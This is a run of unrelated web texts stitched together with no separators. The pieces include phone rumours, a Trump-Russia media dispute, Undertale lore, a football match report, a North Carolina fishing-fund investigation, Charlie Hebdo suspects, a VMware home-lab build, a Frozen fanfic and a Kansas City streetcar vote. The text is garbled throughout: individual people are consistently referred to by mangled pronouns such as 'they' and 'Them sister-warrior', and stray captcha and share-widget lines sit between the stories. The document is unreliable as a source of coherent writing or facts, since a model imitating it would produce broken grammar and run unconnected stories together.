By now it 's pretty clear that most of the top of the line Android smartphones of 2018 will have the Qualcomm Snapdragon 845 SoC at the helm , which was unveiled at the beginning of this month . Thus , the situation next year will pretty much emulate what happened in 2017 with the Snapdragon 835 .
Today from a source in China comes a list of handsets that will be using the SD845 in 2018 along with their expected announcement timelines . We ca n't verify the validity of this information , but the presence of these devices in the list is anything but surprising .
In February , Samsung will unveil the Galaxy S9 and S9+ , which will feature Qualcomm 's chip in some markets . LG will also take the wraps off the G7 during the same month . Then in April the Xiaomi Mi 7 will be outed , followed in May by the HTC U12 . June will be the launch month for the OnePlus 6 , ZTE nubia Z18 , and Sony Xperia XZ Pro-A , while the Samsung Galaxy Note9 arrives in September , alongside the Xiaomi Mi Mix 3 and LG V40 . October is the month when the Google Pixel 3 and Pixel 3 XL get announced , but also the nubia Z18S and Sony Xperia XZ2 and HTC U12+ .
In November Motorola will out the Moto Z 2019 with the SD845 , while December is when OnePlus will release the 6T and Samsung will do the flip phone thing once again with the W2019 , the successor to the W2018 .
There are some interesting omissions in this list , so while it is comprehensive you should n't see it as exhaustive - we could certainly see other devices powered by the SD845 in 2018 , which are n't in it .
Source ( in Chinese ) | Via
On Friday , ThinkProgress published an article authored by Rebekah Entralgo claiming that there is “ growing public evidence of collusion with Russia. ” The article cites what it claims to be “ connections ” that link President Trump with Russian hackers .
There 's one problem : It 's fake news , and we have evidence .
For starters , Entralgo accuses Michael Sainato ( one of the co-authors of this article ) of being part of what they called “ The Jared Kushner Connection. ” Entralgo claims :
In September of 2016 , a freelance writer named Michael Sainato wrote an article for the New York Observer ( whose publisher was Jared Kushner from 2006 until 2017 ) which detailed that the Democratic Congressional Campaign Committee ( DCCC ) had coordinated with Hillary Clinton 's campaign in 2015 , citing an internal DCCC memo leaked to Sainato by Guccifer 2.0 , who published an article on the memo for the Observer , one of the outlets they contribute to as a freelancer .
Russian hackers now leaking directly to Jared Kushner 's paper . Trump campaign not even being subtle anymorehttps : //t.co/cJMdr63xKd — Brian Fallon ( @ brianefallon ) September 6 , 2016
When reached by Mother Jones , Guccifer 2.0 stated they provided Sainato with exclusive documents but denied knowing Sainato was working on an article for the paper owned by Jared Kushner .
ThinkProgress insinuates that Sainato was the link that connects Trump with Russia , a baseless claim started by the Clinton Campaign Press Secretary Brian Fallon , who now works for the pro-Clinton Super PAC , Priorities USA . Essentially , the publication claims that Russian operatives worked directly with Donald Trump 's son-in-law Jared Kushner . In such a contrived scenario , Kushner , or one of their connections , would 'have instructed or tipped Sainato to contact Guccifer 2.0 and publish the leaked documents in the Observer to harm the former Secretary of State , Hillary Clinton .
The author did n't contact Sainato for a request for comment , nor cite Mother Jones 's comment from Sainato .
But in reality , Sainato contacted Guccifer 2.0 through Twitter and the hacker agreed to send the leaked documents to him . This was n't a unique relationship by any stretch . Salam Morcos ( co-authoring this article ) also contacted Guccifer 2.0 via Twitter and twice published leaked DCCC documents in the Progressive Army . The Hill , Daily Caller , the Intercept , and several other outlets repeated this scenario . The authenticity of the documents was never seriously called into question , and the content provided information that was in the public interest . Sainato and other reporters did not release the documents in full but rather reported on the information within those documents that demanded to be reported on . Notice that information , in which Democratic Party organization memos specifically referred to Hillary Clinton as the nominee before the primaries began , are never included in these Russia narratives . Omitting this part of the story implies this information was either false or were not worth reporting on , except neither of those scenarios rings true .
If we stick to ThinkProgress 's editorial integrity , or lack thereof , would Morcos be another “ bombshell ” connection that proves the Trump-Russia connection ? After all , Morcos not only lived in Russia but has close family ties who live in Russia 's capital . There 's a xenophobic driven Neo-McCarthyism at play in these narratives that attempt to imply anything remotely connected to Russia is nefarious .
Shifting the Narrative
If you take a step back , and look at the ThinkProgress article , the author attempts to shift the narrative by putting more weight on “ The Flynn connection ” than actually exists . For example , this is how they sum up the Wall Street Journal article :
In sum , there is evidence that individuals connected to the Trump campaign were seeking stolen emails from Russian hackers and evidence that Russian hackers were trying to provide them to a top Trump adviser .
You 'll notice throughout their reporting that they refer to hackers as being from Russia , but not the “ Russian government. ” By not stating the facts , the author attempts to trick the reader into reading more into their article than actually exists , namely , the Russian government hacked the DNC . Just because a person is purported to be from a certain country does not , by any means , make that person an official of the government . They do n't have the evidence to fill in the gaps or voids in the narrative , so they are drawing their own conclusions to compensate .
Mr. Smith , who was the center of the WSJ report , themselves makes the distinction , stating “ he believed Russians were likely among those who tried to steal Mrs. Clinton 's emails , [ but ] they dismissed intelligence agencies ' conclusion that the Russian government meddled in the election to discredit Mrs. Clinton and to help Mr. Trump . ”
Resets do not work on the surface ( mostly )
( undertale spoilers )
The one with the greatest determination has control over the timeline . They have the ability to use save , load , and reset . However , there is no explanation as to how this is possible , but there is an even bigger question : do the resets affect the surface ? The key to this question lies in the fallen humans .
Although not much is known about the fallen humans , it is implied that they all shared the power over the timeline , thanks to their determination . When Frisk confirms that Toriel correctly guessed their preferred flavor from a previous timeline , Toriel mentions how this is n't the first time they felt familiarity with a fallen human .
» read more : the fallen humans could save , load , and reset
Despite this power , all the fallen humans shared the same fate – they could not get past Asgore . They had likely given up in their fights against him . Although Toriel offered the humans a new home with her , each one chose to leave them While it is uncertain why the humans ended up on Mt . Ebott , they all presumably wanted to return to the surface . Thus , it is very likely that humans do not have the power to reload on the surface – if they did , the fallen humans could have loaded to a save point before falling in . Each human chose to face the dangers of an underground full of monsters that wanted their souls in exchange for freedom . This would have been a foolish venture if the humans could simply load to a save point on the surface before the fall .
If save points only exist in the underground , then it seems reasonable that only the underground would be affected . After all , Flowey proves that others can remember between reloads , not just the wielder of the power . The key is likely high amounts of determination , which Flowey was injected with . However , it 'd be strange for the entire human race to be affected by reloads and retain their memories .
While not much of Frisk is seen in the ending credits on the surface , Frisk is seen for a brief moment in their own bedroom of Toriel 's new home ( if Frisk chooses to stay with Toriel ) . In this scene , there is no save point . While this is n't definitive evidence that save points do not exist on the surface , it is noteworthy that the last save point seen is in the underground . Furthermore , the save points in the underground continue to exist after the end of the true pacifist route , which is why Frisk is able to load back into the underground when the player selects “ Continue . ”
There is one anomaly to the idea of resets only affecting the underground – the true reset . The power of a true reset can bring all the monsters back into the underground and to the very start of the game . However , it is n't clear whether or not the rest of the surface world is affected .
» read more : true reset
The true reset is described as an act of ripping the monsters from this timeline , rather than the timeline being reset . Resetting just the underground means bringing the barrier back , as well as everyone within it . The monsters are also affected by a complete memory wipe as a side effect . No more deja vu feeling . While it may be strange that the surface appears the same after every true reset , this could be attributed to the “ ripped from the timeline. ” However , the most likely conclusion is that this is simply a plot hole , given that the monsters always exit the underground and see the sun on the horizon , no matter how long it takes to complete the route . It is simply one of those constants .
In conclusion , there is not enough information to determine whether or not a true reset effects the surface , however , the strange phrasing may mean the surface timeline continues forward while only the underground is reset . It is implied that humans can not use save/reload on the surface since if they could , they would reload to a point prior to falling into Mt Ebott . It also appears that save points can only exist in the underground , which is why they can be loaded even after Frisk has gone to the surface .
Interestingly , the underground and surface can be a metaphor for the game and the real world . In the real world , the player , ca n't use game mechanics . But when the player enters the game – the underground – they have all this power . Power that is left behind once the player exits .
A claim by Vladimir Putin 's spokesperson that people associated with Hillary Clinton also met with the Russian ambassador is the latest detail to cause problems for Democrats who blasted Attorney General Jeff Sessions for meeting with the same official last year .
It was immediately denied by a former Clinton campaign spokesperson .
Dmitry Peskov said on CNN Saturday that Ambassador Sergey Kislyak 's job is to meet with officials on both sides of the political aisle , and to foster “ bilateral relations. ” They said people associated with Clinton during the presidential campaign met with them too .
“ Well , if you look at some people connected with Hillary Clinton during their campaign , you would probably see that they had lots of meetings of that kind , ” Peskov said . “ There are lots of specialists in politology , people working in think tanks advising Hillary or advising people working for Hillary . ”
However , former Clinton campaign spokesperson Nick Merrill told Fox News Monday night `` it 's not true , which is why they 're using the word `` probably '' is my guess . ''
Sessions faces sustained criticism from Democrats after two 2016 meetings with Kislyak were revealed in the press . The biggest issue for Sessions was that they claimed in their Senate confirmation hearing they did not have communications with Russian officials . Some Democrats accused them of perjury . While Sessions defended their statements , they agreed to recuse themselves from any campaign- and Russia-related investigations .
Some Democrats , though , went further and suggested the meetings themselves were out of the ordinary . It did n't take long for Kislyak 's many past meetings with members of both parties to come to light .
After House Minority Leader Nancy Pelosi , D-Calif. , denied having met with the ambassador , Politico unearthed a 2010 photo showing a meeting of congressional lawmakers and then-Russian President Dmitriy Medvedev . Pelosi and Kislyak were present .
Sen. Claire McCaskill , D-Mo. , also tweeted that they had “ been on the Armed Services Com for 10 years . No call or meeting w/Russian ambassador . Ever . Ambassadors call members of Foreign Rel Com. ” This turned out not to be true after online sleuths found a 2013 tweet in which they said : “ Off to meeting w/Russian Ambassador . ”
McCaskill 's 2013 meeting involved 10 senators , of both parties . They were appealing to Kislyak for Moscow to reverse its blockade of U.S. adoptions of Russian children .
Democrats have noted that none of the Democratic meetings revealed to date were one-on-one , and that the main issue with Sessions is they denied Russia contacts at the confirmation hearing .
Sessions has said they were answering in the context of campaign-related discussions . They have since sought to clarify the record .
A photograph Fred Ressler ( b . 1941 ) snapped in 1995 revealed a portrait filtering through foliage , against the side of their home . For the next five years , Mr. Ressler would wander through their wooded property in search of images entwined in the shadows . The play of light revealed proportionate visages . The number of features that are recognizable in shape , size and placement is decisive for Mr. Ressler . Each image must have at least four discernable features , such as a head , nose , chin , and eye . The maximum number of harmonious features they had realized in one photograph is 36 , in an image of Albert Einstein . Angel Blues Singer Dan Doloff Dylan Eileen Einstein E.T . African Eve Lila Native American Princess Modigliani 's Mistress Mother and Child D.S . Punker in Lace Madonna Cat Faced Woman
Frazer Wright 's close-range finish earned St Johnstone a first-leg win over Rosenborg in the Europa League second qualifying round .
David Wotherspoon 's 19th-minute corner fell to Wright , who bundled home from three yards at the Lerkendal Stadion .
The Norwegians almost levelled when Nikki Bille Nielsen 's shot drew a great save from Saints ' Alan Mannus .
Wotherspoon went close in the second half and the visitors worked hard to prevent an equaliser .
Rosenborg , with home advantage and midway through their domestic season , had threatened early when Nielsen cracked a low shot just wide .
But Tommy Wright 's St Johnstone looked more than capable either side of Wright 's crucial goal .
Wright netted from close range for the opener
Wotherspoon fired wide and Steven MacLean tested goalkeeper Daniel Orlund before Wright stabbed home the potentially crucial away goal .
Mannus then made a magnificent save to deny Nielsen from six yards , the stopper instinctively throwing a boot out to block the effort .
Saints almost moved further ahead straight into the restart . Wotherspoon 's chipped shot took a deflection and Orlund dived to their right to palm away for a corner .
MacLean then fired narrowly wide of the keeper 's left-hand post as the visitors kept the pressure on .
Rosenborg 's Daniel Berntsen volleyed from 20 yards but Mannus blocked well and , a minute later , used their feet to deal with another of the midfielder 's attempts .
Sandwiched between those chances for the hosts , Chris Millar fired just wide for St Johnstone as the game raged from end to end .
Mannus was called into action again to deny further efforts from Mike Jensen and Berntsen .
Saints weathered some serious pressure as the game neared its end but were always threatening in attack with Gwion Edwards rattling a shot over the bar in the last few minutes .
And the Scottish top-flight outfit held on to record a stunning victory against a team who outgun them financially by a huge margin and St Johnstone now have a decent chance of progressing in the competition .
The two sides meet again at McDiarmid Park for the second leg next Thursday .
You must enter the characters with black color that stand out from the other characters
Message : * A friend wanted you to see this item from WRAL.com : http : //wr.al/18Vqe
— Every time a coastal fishing license is sold in North Carolina , a portion of the money is supposed to help improve fishing on the coast , but some recreational anglers say the state is reeling in some of that revenue for other purposes .
When the fishing license law was passed a decade ago , it clearly stated the state Division of Marine Fisheries `` may not authorize the disbursement of endowment investment income to establish positions without specific authorization from the General Assembly . ''
`` There 's been clear intent , I think , to go in and raid that fund , '' recreational fisherman Scott Griffin said recently .
Fishing licenses cost anywhere from $ 5 for 10-day privileges up to $ 250 for a lifetime pass , and they generate more than $ 4 million in revenue a year fro the Marine Resources Fund .
Of the $ 45.9 million the licenses have brought in since the program 's inception , records obtained by WRAL Investigates show that $ 11.7 million – more than a quarter – has gone to DMF salaries . The records also show that the employees paid with fishing license funds have received annual 3 percent pay increases – at a time when other state employees received little or no bumps in pay .
`` This fund should absolutely never be encumbered by general operating expenses of that division at all , end of discussion , '' Griffin said . `` It should go to habitat . It should go to fish stocks , hatcheries , anything that 's going to get our fishery up to par . ''
DMF Director Braxton Davis said the license revenue is being spent properly .
`` I 'm not aware of any expenditures of Coastal Recreational Fishing License revenues for anything outside of the stated purposes of the fund as outlined in state law , '' Davis said in a statement .
The agency obtained legislative approval for staff positions designed to oversee projects funded through license revenue , officials said . Some other DMF positions paid for with license funds had lost other funding or were in danger of getting cut in the state budget , and those moves did n't require approval , according to officials .
DMF has handed out about $ 18 million in license revenue in grants for various projects on the coast , but more than $ 4 million of that came back to the agency , such as $ 285,000 for publications . Griffin said the state should have provided the agency with funds to cover its operations .
`` DMF should n't write grants to themselves to manage our fisheries . I mean , it 's the craziest thing ever , '' they said .
Rep. Larry Yarborough , R-Person , has called on the State Auditor 's Office to look into how the license money is spent .
`` The more I 'm finding out , there are all kinds of problems with the way our marine fisheries are being managed , '' said Yarborough , an avid angler who usually goes out of state because of their reservations about North Carolina coastal fishing .
`` After a while , it became clear that I could spend a weekend down on the Gulf Coast and catch more fish in one weekend than I could in a whole summer down on the Core Sound , '' they said .
Davis said state auditors reviewed the fishing license fund this year and turned up no negative findings .
`` Nothing that I 've seen or anyone shows that that money is missing . It 's just gone in the wrong buckets , '' Griffin said , saying the license money should be focused on things to increase coastal fish stocks , not on administrative costs .
`` If we put the money in the bottom of the ocean and we harvest it and grow it up and let it bloom , every user group wins , '' they said .
Concern goes beyond the fishing license revenue .
Sportsmen pay a federal tax every time they buy a reel , trolling motor or shotgun shells , meaning millions of tax dollars should be coming back to North Carolina to support hunting and fishing . Yet , the U.S . Fish and Wildlife Service threatened in March to withhold funding because of a lack of control over the Marine Resources Fund .
State lawmakers this year moved control of the money to DMF from a committee of the state Marine Resources Committee to bring North Carolina into compliance with federal law and satisfy FWS ' concerns .
`` We 've got 1.2 million folks paying in $ 20 ( million ) to $ 30 million ... that can go to our competing states when we 're found not compliant , '' Griffin said .
Michelle Duggar via TLC ( youtube )
Fayetteville , Arkansas voters overturned a local ordinance outlawing discrimination against people on the basis of their sexual orientation or gender identity on Tuesday .
David Badash at The New Civil Rights Movement reported that the ballot race came to national attention earlier this year when Michelle Duggar — matriarch of the TLC show 19 Kids and Counting — made a series of fear-mongering robocalls encouraging voters to vote against equal rights for LGBT citizens .
Fayetteville residents voted in a 52 to 48 percent split to overturn Ordinance 119 , a nondiscrimination law that “ prohibits discrimination in employment , housing , real estate transactions , city services , business transactions and public accommodations based on ‘ race , ethnicity , national origin , age ( if 18 years of age or older ) , gender , gender identity , gender expression , familial status , marital status , socioeconomic background , religion , sexual orientation , disability or veteran status . ”
Duggar joined the effort to overturn the law in late summer , recording robocalls that went out to every phone in Fayetteville in which they described LGBT people as a threat to the community .
Ordinance 119 allowed trans men and women to use the public facilities of their adopted gender , a state of affairs that Duggar described in a call as “ males with past child predator convictions that claim they are female to have a legal right to enter private areas that are reserved for women and girls . ”
“ I doubt that Fayetteville parents would stand for a law that would endanger their daughters or allow them to be traumatized by a man joining them in their private space , ” the mother of 19 said .
Local minister Duncan Campbell told Fayetteville 's Channel 5 News that the right to discriminate against lesbians , gays , trans men and women and bisexuals is a free speech issue .
“ We wanted to repeal the ordinance because we did n't believe it made Fayetteville a fairer city or a freer city , ” they said . “ It did just the opposite . It was called the Civil Rights Ordinance , but it was misnamed . It was an ordinance that actually took away civil rights and freedom from people . It criminalized civil behavior . It did n't accomplish the stated purpose of the ordinance and it was crafted by an outside group , it was n't something Fayetteville residents put together . ”
Badash at New Civil Rights pointed out that the Duggars are also using the newfound wealth from their reality TV series to influence the outcomes of local elections .
“ The 19 Kids and Counting family “ donated $ 10,000 toward the campaigns of the three most outspoken opponents to Fayetteville 's new Civil Rights Administration ordinance , ” wrote Badash . “ The Duggars gave $ 2,000 to John La Tour , and $ 4,000 to both Joshua Crawford and Paul Phaenuef , ” the Fayettevile Flyer reported October 31 . ‘ La Tour , Crawford , and Phaneuf have all said they oppose the ordinance and were each listed as contacts on a press release for Repeal 119 . ' ”
French police officials have identified three men as suspects in the deadly terror attack at the Paris offices of the Charlie Hebdo newspaper .
One of the men , 34-year-old Cherif Kouachi , was convicted on terrorism charges in 2008 .
Two of the suspects , brothers Cherif and Said Kouachi , 32 , are French nationals who were born to Algerian parents in Paris . The nationality of a third man , Hamid Mourad , 18 , is unknown ; police believe they are a high school student .
Their names circulated on Facebook and Twitter for an hour before French authorities confirmed that the Kouachi brothers had been identified .
One of the officials who spoke to the Associated Press said they were linked to a Yemeni terrorist network .
The officials spoke on condition of anonymity because they were n't authorized to publicly discuss the sensitive and ongoing investigation .
The older brother was arrested in Paris in January 2005 when they were caught trying to fly to Damascus , Syria , on their way to join the Iraqi insurgency , according to a 2008 Bloomberg report . Cherif Kouachi reportedly told a court that they were inspired by detainee abuse by U.S. troops at Baghdad 's infamous Abu Ghraib prison , though they were relieved they were stopped , according to the Bloomberg report .
A 2005 Pittsburgh Tribune Review report , citing Kouachi 's lawyer , said the would-be terrorist was not religious , drank alcohol , smoked marijuana , had premarital sex with their girlfriend and had a job delivering pizzas . At the time , Kouachi had learned `` the basics '' on how to handle Kalashnikovs , Le Monde reported .
They were convicted in 2008 of terrorism charges for helping funnel fighters to Iraq 's insurgency and given a three-year sentence , half of which was suspended .
It is n't immediately clear if they had traveled back to the Middle East since they were identified in connection with the attack .
Ironically , in 2008 , their name again surfaced in an International Herald Tribune story detailing how security analysts decided their fears over foreign fighters returning to Europe were `` overblown . '' By then , Kouachi was a fishmonger .
They then dropped off the grid , only to surface on Wednesday , officials say , in the attack that killed 12 innocent people — eight journalists , two police officers , a receptionist and a guest of a cartoonist .
The attack
Twelve people were killed in what France 's president called a `` terror attack '' on satirical magazine Charlie Hebdo in Paris on Wednesday , leading authorities to launch a massive manhunt for the gunmen , who remain at large . No arrests have been confirmed in the hunt for the attackers , though an `` anti-terror raid '' is reportedly underway northeastern city of Reims .
The brothers , caught on tape by an eyewitness , shouted `` Allahu akbar ! '' as they walked outside the building carrying large guns and dressed entirely in black . The magazine staff was in an editorial meeting , around lunchtime in Paris , when the gunmen opened fire . Eleven others were wounded ; four of those injuries are serious .
See also : What we know about the Charlie Hebdo terror attack victims
Witnesses described the gunmen as speaking perfect French .
Charlie Hebdo has frequently drawn condemnation from Muslims . In 2011 , the magazine was firebombed after it ran a cartoon depicting the Prophet Muḥammad .
The editor in charge of the paper was one of those killed on Wednesday . There was no immediate claim of responsibility , though supporters of militant groups like the Islamic State and al-Qaeda praised the attack online . World leaders condemned it as an attack on freedom of expression .
Additional reporting by The Associated Press
A map created by researchers at the University of Maryland , Baltimore County ( UMBC ) is helping modern-day Baltimore lovers catch a glimpse of Charm City 's past .
BEARINGS ( Bird 's Eye Annotated Representational Image/Navigable Gigapixel Scene ) of Baltimore features the ability to zoom in on notable landmarks , circa 1815 . It also features an overlay of the 2014 city map so viewers can compare it to what Baltimore looks like today . ( Note that today 's tech hubs in Canton and Federal Hill are not yet “ on the map . ” )
The project was helmed by a large team from UMBC , which put the map together in time for the Battle of Baltimore bicentennial last fall . Joshua Cole , the environmental data manager at UMBC 's Center for Urban Environmental Research and Education , and a team of students researched the topography of the city and pulled together the GIS data . Then , artist Tamara Peters consulted experts , and interns created 3D models .
The result is an awesome , interactive 3D map that has found an excited audience on Reddit this week .
-30-
An image used in the second episode of Batman : The Telltale Series bears an unfortunately undeniable resemblance to a photo of the Russian Ambassador Andrei Karlov taken just moments after they were publically assassinated at the hands of a Turkish police officer last December .
While it is n't uncommon for artists or game developers to base scenery and objects off of real-world images , the practice itself requires a certain level of caution and means creators need to carefully vet both the final product and the materials used during production .
In the case of the Telltale image , the in-game moment itself depicts the aftermath of a bank robbery , with two figures laying on the ground on each side of the vault . Based on reports from Eurogamer , the figure on the right appears to be lifted from or heavily modeled after a distinctive photograph taken shortly following Karlov 's death . For comparison 's sake , the two graphic images can be found here .
In recent memory , both Bungie and Naughty Dog have had to rework content and issue statements following in-game assets that were not properly vetted though , admittedly , the issues faced by those two developers were of a less graphic nature .
Update : When contacted by Gamasutra , a Telltale Games representative responded with the following statement :
`` An update to the game has been submitted this morning that will be removing the image across all platforms . We regret this incident occurred , and we are taking appropriate action internally to ensure that we continue to maintain our high standards in Production and Quality Assurance . ''
An infamous online troll and fake news writer was found dead in their Arizona home , authorities said Tuesday .
Paul Horner , who penned debunked articles about Bill Murray running for president and President Barack Obama opening a Muslim museum , was discovered unresponsive in their bed Sept 19 .
There were no signs of foul play , according to the Maricopa County medical examiner , and there was evidence the death could be due to an “ accidental overdose . ”
During the 2016 presidential election , Horner created a list of websites that appeared to be legitimate news sites to spread false information .
One article that claimed protesters who disrupted Donald Trump rallies were paid $ 3,500 went viral on the internet and fueled endless rumors about the alleged conspiracy .
Despite the fact that no evidence existed , Trump repeated the charge about the paid protesters while on stage during one of their rallies .
Horner told the Washington Post last November that although the information was clearly fabricated , they made thousands of dollars each month from them because Trump 's supporters were “ easy to fool . ”
In the same interview , Horner said they thought Trump won the White House because of him .
“ His followers do n't fact-check anything — they 'll post everything , believe anything , ” Horner told the paper about Trump .
Another notable fake news items claimed Horner was a Secret Service agent who penned a book revealing Obama to be a gay Muslim .
The Associated Press fact check from last December cited a Secret Service spokesperson as saying records dating back to 1990 reveal no agent named Paul Horner .
VMware Portable Lab
I have been stalking home/training lab posts from significant contributors to the VMware community like @ ChrisWahl and @ virten for quite some time . Finally , I decided it was time to pull the trigger on a lab for the IT Division where I work . We are a three-person IT group and have virtualized 100 % of our servers on VMware . I have the most experience in our division with virtualization and have built or rebuild nearly all of our physical and virtual infrastructure over the past six years . The other two members of our Division are taking on more and more responsibilities and having a training lab will enable us all to increase vSphere skills and hands-on knowledge .
The three hosts in our cluster are new fifth generation Intel NUC barebone kits . The parts lists are as follows :
( 3 ) Intel® NUC Kit NUC5i5MYHE
( 6 ) Crucial 8GB DDR3 PC3-12800 RAM CT102464BF160B
( 3 ) SanDisk Ultra Fit USB 3.0 Flash Drive 16GB SDCZ43-016G
( 3 ) Kingston SM2280S3/120G M.2 SATA SSD 120GB
( 3 ) HGST Travelstar 7K750 640GB mechanical hard drive
Because this is a shared lab , I wanted to make the lab portable . I thought about only mounting everything to a Melamine board and then remembered that we had rescued a rugged shipping/transportation container that held mobile meter reading handhelds . Our Water Division had upgraded to newer units , and the equipment case had ended up in our basement surplus pile .
Sidenote : If anyone from VMware reads this , I would love a nice VMware decal to cover up the Itron silk screening .
We stripped the fitted foam liner out of the case and quickly realized that our Ubiquiti EdgeSwitch ES-24-250W spare unit fit perfectly . We use Ubiquiti hardware for wirelessly linking ten locations ( buildings and remote cameras ) back into our fiber connected buildings and then into our core . We had a StarTech 4U RK419WALLV 19in vertical wall mount in our surplus pile from a building that had been remodeled and ended up with a larger enclosed wall mount .
With those building blocks in place , we tried to figure out an elegant way to attach the NUCs in a clean fashion . It was decided to use a flat surface perpendicular to the switch so that all cables are hidden under the new “ false bottom ” of the case . Our Building Maintenance Division has an employee that is amazing with fabrication , and they had a remnant piece of aluminum sheeting . They installed brackets for the aluminum , cut the scrap down to size , drilled the mount holes and a finger hole to remove the shelf when needed .
We mounted Scotch Outdoor Fasteners , Clear 1 in x 4 ft Velcro to the bottom for cable management . The switch required a 90 degree power cord in order to fit the way we wanted . The NUCs mount to the aluminum shelf with the same Velcro fasteners .
A company that I do some consulting for recently changed from horizontal PDUs to vertical zero space PDUs and gave me a nice APC AP7802 PDU for the portable lab . We had to swap the twist lock end for a standard three prong ends . The PDU is complete overkill , but it was free and fit perfectly in the 4U wall mount rack .
We wanted to be able to connect to the lab environment wirelessly , so we added a UniFi 802.11ac Access Point inside the lid of the case .
With the build complete , it is time to move on to installing and configuring . I will add a blog post or two on those topics , trying not to duplicate any of the great write-ups that are already out there . If you have any questions feel free to hit me up on Twitter @ vmChad , or in the comments section below .
High-resolution photos here .
# this was not a thinly veiled attempt to get a writer to give the prompt some love ..
oh really now ? ahem .
The Long , Long , Longship
The Norse encampment stood at the edge of Arendelle 's rocky shore , in the mists and slate-grey light of early morning . Their leader , hight Elsa Snowcrown , Elsa Winterwolf , Elsa Bringer Of Tears , stood before their dragon-crowned longship as the blue-green seawaters crashed against the rocks behind them
An iron helm failed to hide the glory of their blond hair , gently moving in the morning breeze as they strode back and forth , summoning them Norsemen . They gathered before them as they said , “ Warriors ! Vikings ! Today we face the Saxons to claim our property and our honour ! Danger and glory lie before us , cowardice behind ! Come , Norsemen , seize your spears and seize your destiny . Valhalla becons ! Rise from your beds , stand like heroes , and WHAT THE HEL IS THAT ? ”
Them sister-warrior approached , hight Anna Sea-Eyes , Anna The Red , Anna Berserker-Pants . They were clad as a proper Norse warrior in hide and bearskin , except for their head . They wore a helm , but fastened to it were two horns , curving upwards .
“ What the Hel is what ? ” they asked , grinning proudly .
Elsa took off their own helm so they could facepalm properly . “ Your helmet . What are those…things…on your helmet ? ”
“ They 're horns . ”
Elsa huffed angrily . “ I can see that . ”
“ Do you like them ? ” Anna asked sweetly .
“ Do I like them ? Do I… NO ! I do not ! Do you mean to sneak up on the Saxons disguised as a cow ? ”
Anna scoffed . “ No , of course not , silly . ”
Elsa turned away and spoke to the heavens . “ Odin All-Father , Odin The Wise , Odin whose ravens Thought and Memory bring you knowledge from all the world , perhaps you are clever enough to explain to me how my sister Anna Cow-Head can come out here with horns attached to their helm and I 'm the silly one ? ” They turned back to Anna . Too-sweetly they asked , “ Why are there horns on your helmet ? ”
“ I 'm so glad you asked. ” As Elsa rolled their eyes , Anna explained . “ Suppose we 're fighting the Saxons . Well , I mean we are fighting them , obviously . But imagine . I 'm heading back to the longship , arms full of war-spoils . Then a Saxon comes at me . What do I do ? Drop my stuff and grab my sword ? Too late . But this way , I just lower my head at them and poke them in the stomach . Problem solved ! ”
Anna stood proudly before their unimpressed sister . Them face impassive , Elsa flicked out with their sword and tapped one of the horns , knocking Anna 's helmet off their head . Anna picked it up and put it back on , saying , “ Well , obviously I 'm still working on – ” Elsa 's sword flashed again and slapped the other horn , knocking the helmet off to the other side . Anna bent down for their helmet again . “ It 's a good idea in principle , I just need – ” As Anna stood , Elsa reached out . With their thumb and forefinger they gently held the tip of one horn and pulled down . The helmet skewed sideways , blocking Anna 's vision .
Elsa sighed . “ Leverage , Anna The Too-Clever-For-Her-Own-Good . Leverage . The only way one of those horns will bring down a foe is if you fill it with mead and get them falling-down drunk . Now go take those things off and hurry back . We leave with the tide. ” As Anna left , Elsa returned their attention to the rest of their crew . “ Warriors ! We – hold on , where 's Kristoff ? ”
They heard a voice coming from behind . “ Elsa ! I had a great idea ! ” They turned to see them standing proudly , dressed for battle , with a narwhal tusk jutting upward from their helm .
Elsa slapped their forehead , then slid their hand down to cover their eyes . “ This is gon na be a long trip . ”
It 's back to the drawing board for Kansas City 's streetcar supporters .
Voters hit the brakes Tuesday on an ambitious plan to expand streetcars past downtown . They trounced a new streetcar taxing district , with 60 percent voting against it in unofficial final returns .
“ I think people began to realize this was a boondoggle , ” said Sherry DeJanes , a Kansas City lawyer who led the organized opposition to the city 's streetcar proposal . “ Finally , the city can get back to the business it should have been doing and attend to the things that are important . ”
DeJanes said the taxes proposed for the streetcar district were too high and imposed too great a burden on low-income residents .
Sign Up and Save Get six months of free digital access to The Kansas City Star
Mayor Sly James lamented the defeat but said the city ca n't just give up on its dreams of propelling streetcars past downtown .
“ We 're not going to let the starter line be the end of the line for this thing , ” they said . “ It 's ridiculous to think that . ”
The result means Kansas City will not seek voter approval in November for specific sales and property tax increases to help pay the local share of a $ 515 million transit plan . And it calls into question whether , or how soon , Kansas City can build a broader streetcar system beyond the two-mile starter route .
James conceded they had thought this plan would win at the ballot box and they are n't sure what Plan B would be , or whether it will emerge from city officials or from a citizen-led initiative .
“ It 's very possible either way , but we 're not going to just roll over and let it go , ” they said . “ We 've got to continue to look for options to get the job done . ”
Streetcar planners had hoped to expand the starter route farther south on Main Street to the University of Missouri-Kansas City , east on Independence Avenue to Benton Boulevard and east on Linwood Boulevard to Prospect Avenue . The plan also called for establishing a MAX rapid bus line on Prospect Avenue south to 75th Street .
The vote was a big loss for James and other city leaders , who had campaigned hard for the expansion , saying Kansas City is years behind other cities in rail transit and needs to catch up .
James and others had said that now was the best time to go big with streetcars because the Obama administration looks favorably on Kansas City 's streetcar potential . Kansas City advocates had hoped to lock in the local funding and then seek $ 250 million in federal dollars to make the plan a reality . The future of federal funds for streetcars under a different administration after 2016 is far from certain .
Supporters also had argued that this would be one of the biggest economic investments ever on the East Side . They had predicted streetcars would lure residential and commercial developers to Independence Avenue and Linwood Boulevard in ways that other efforts to stimulate economic progress there have failed .
But opponents doubted the economic development projections and countered that the plan was far too expensive . They said it was unfair to struggle East Side residents who would pay the tax but live too far from the streetcar to use it . The plan had contemplated a 1-cent sales tax increase within the district , plus special assessments for properties closest to the proposed routes .
Opponents also said buses were a far cheaper transit option and much more flexible to change as circumstances warrant .
Terrence Nash , a long-time neighborhood activist , said Kansas City just is n't dense enough to support streetcars and needs to concentrate on improving the bus system . “ I believe they should have the Prospect MAX , ” they said , adding that bsic services should be the priority , rather than “ trophy projects . ”
Tuesday 's election also saw defeat for a proposed three-quarter-cent statewide sales tax to improve state highways , bridges and transit . If the state tax had passed , Kansas City leaders were anticipating $ 144 million for the streetcar and Prospect MAX , but now neither the local nor state transportation plans will move forward anytime soon .
Streetcar opponents prevailed Tuesday despite being outspent more than two to one in the campaign . The pro-streetcar campaign , called Connect KC , raised more than $ 387,000 , with large contributions from the downtown Marriott , Burns & McDonnell and other major construction and engineering firms , law firms and development boosters .
The anti-streetcar campaign , called SmartKC , raised about $ 139,000 , including $ 50,000 from mortgage banker James Nutter Sr. and $ 75,700 from a secretive non-profit group called Missourians for Responsible Government that does not disclose its donors . The African-American political club Freedom Inc. also came out staunchly against the streetcar plan .
